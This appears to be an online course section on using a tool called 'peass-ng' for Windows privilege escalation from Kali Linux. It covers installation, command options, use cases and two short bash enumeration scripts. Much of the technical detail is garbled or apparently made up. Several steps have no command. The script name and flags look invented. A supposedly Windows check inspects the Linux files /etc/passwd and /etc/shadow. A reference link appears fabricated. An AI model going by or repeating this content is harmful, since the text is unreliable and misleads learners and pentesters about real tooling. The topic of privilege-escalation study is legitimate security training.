Course #437: Mastering peass-ng for Windows Privilege Escalation
# Course #437: Mastering peass-ng for Windows Privilege Escalation
## Section 5: Advanced Usage and Implementation of peass-ng
In this final section of the course, we will dive deep into the installation, configuration, and advanced usage of the 'peass-ng' tool on Kali Linux. We will explore real-world use cases of peass-ng for privilege escalation in Windows environments and provide detailed technical explanations, code examples, and external references to enhance your understanding and capabilities as a pentester.
### 1. Installation and Configuration of peass-ng on Kali Linux
peass-ng (PowerPrivilege Escalation Awesome Scripts SUITE – Next Generation) is a powerful framework that enables security professionals to automate the process of privilege escalation on Windows systems. It is essential to set up this tool correctly to effectively utilize its capabilities.
#### 1.1. Prerequisites
Before installing peass-ng, ensure you have the following prerequisites:
– A Kali Linux installation (preferably the latest version).
– Basic knowledge of the command line.
– Internet access for downloading necessary dependencies.
#### 1.2. Installation Steps
1. **Open Terminal**: Start your Kali Linux terminal.
2. **Update Package List**: It’s a good practice to ensure your package list is up to date. Run the following command:
sudo apt update && sudo apt upgrade -y
3. **Install git**: If you do not have git installed, install it using:
4. **Clone the peass-ng Repository**: Download the latest version of peass-ng from GitHub:
git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
5. **Navigate to the peass-ng Directory**:
cd privilege-escalation-awesome-scripts-suite/peass-ng
6. **Install Dependencies**: Before using peass-ng, ensure all dependencies are installed. This may include various Python packages and other utilities. You can install them with:
sudo apt install python3 python3-pip -y
pip3 install -r requirements.txt
7. **Make the Scripts Executable**: Ensure that the scripts are executable:
8. **Configuration Checks**: Verify that all necessary configurations are set up correctly by running:
### 2. Step-by-Step Usage of peass-ng
Now that you have installed and configured peass-ng, let’s explore how to use it effectively.
#### 2.1. Overview of the Tool Structure
peass-ng consists of several components, including:
– **peass-ng directory**: Contains the main scripts and modules.
– **peass-ng.sh**: The entry point for running the tool.
– **Tools for different privilege escalation techniques**: Various scripts categorized for different exploitation methods.
#### 2.2. Running peass-ng
1. **Begin by running the main script**:
2. **Choose the type of environment**: You will be prompted to select the type of Windows version you are testing against (e.g., Windows 10, Windows Server, etc.).
3. **Select the Method**: You can choose different methods of enumeration such as:
– **Basic Enumeration**: Quick checks for common privilege escalation vectors.
– **Full Enumeration**: Comprehensive checks covering multiple vectors.
4. **Save Output**: The results can be saved to a file for later analysis:
./peass-ng.sh -o output.txt
#### 2.3. Real-World Use Cases
Understanding how to apply peass-ng in real scenarios is crucial. Here are a few illustrative examples:
##### Use Case 1: Local Privilege Escalation
Imagine a situation where a user has limited permissions on a Windows machine, but you need to gain administrative access. You could run peass-ng to check for misconfigurations or poorly set permissions:
1. Execute the following command:
2. Analyze the output, which may reveal weak ACLs on certain files or directories.
##### Use Case 2: Service Misconfigurations
Services running with high privileges (e.g., Local System) can often be exploited. By running peass-ng, you could discover:
1. Services set to "Auto" but with file paths pointing to user-controlled locations.
2. Example command to check services:
./peass-ng.sh -m services
3. The output will list services and potential exploitation vectors.
#### 2.4. Advanced Configuration Options
peass-ng offers several advanced options to tailor the enumeration process:
– **Custom Scripts**: You can create your own scripts and include them in the peass-ng framework for custom checks.
– **Environment Variables**: Set environment variables to control the behavior of scripts. For example:
– **Verbose Mode**: Use verbose mode to get more detailed information.
### 3. Detailed Technical Explanations
Understanding the underlying technology and concepts is vital for effective pentesting. Here are some key areas to focus on:
#### 3.1. Windows Privilege Escalation Techniques
– **Token Manipulation**: This involves using a stolen token to impersonate a user with higher privileges.
– **DLL Hijacking**: Attackers can exploit applications that load DLLs in an insecure way, allowing them to run malicious code with higher privileges.
– **Scheduled Tasks**: Poorly configured scheduled tasks can be abused to gain elevated privileges.
#### 3.2. External References
– [Microsoft Security Documentation](https://docs.microsoft.com/en-us/security/)
– [SANS Penetration Testing Resources](https://www.sans.org/)
– [OWASP Cheat Sheet on Privilege Escalation](https://cheatsheetseries.owasp.org/cheatsheets/Privilege_Escalation_Cheat_Sheet.html)
### 4. Code Examples
Below are some code snippets to illustrate how you can set up and run peass-ng effectively for Windows privilege escalation.
#### 4.1. Basic Script Example
Here’s a basic script to check for common privilege escalation vulnerabilities:
"`bash
#!/bin/bash
# Simple privilege escalation check
echo "Running basic privilege escalation checks…"
./peass-ng.sh -m basic
"`
#### 4.2. Custom Enumeration Script
You can create a custom enumeration script like this:
"`bash
#!/bin/bash
# Custom script to find weak permissions
echo "Checking for weak permissions…"
# Check specific directories
for dir in "/etc/passwd" "/etc/shadow"; do
if [ -w "$dir" ]; then
echo "Weak permissions found on $dir"
fi
done
"`
### Conclusion
In this section of the course, we have extensively covered the installation, configuration, and usage of peass-ng for privilege escalation in Windows environments. By understanding its features and applying it to real-world scenarios, you can enhance your pentesting capabilities and uncover potential vulnerabilities in Windows systems.
Make sure to continuously practice and update your knowledge, as cybersecurity is an ever-evolving field. Utilize the provided external resources and experiment with different scenarios to gain practical experience.
**Congratulations on completing Course #437: Mastering peass-ng for Windows Privilege Escalation! You are now equipped with valuable tools and knowledge to further your career in pentesting and cybersecurity.**
—
Made by pablo rotem / פבלו רותם
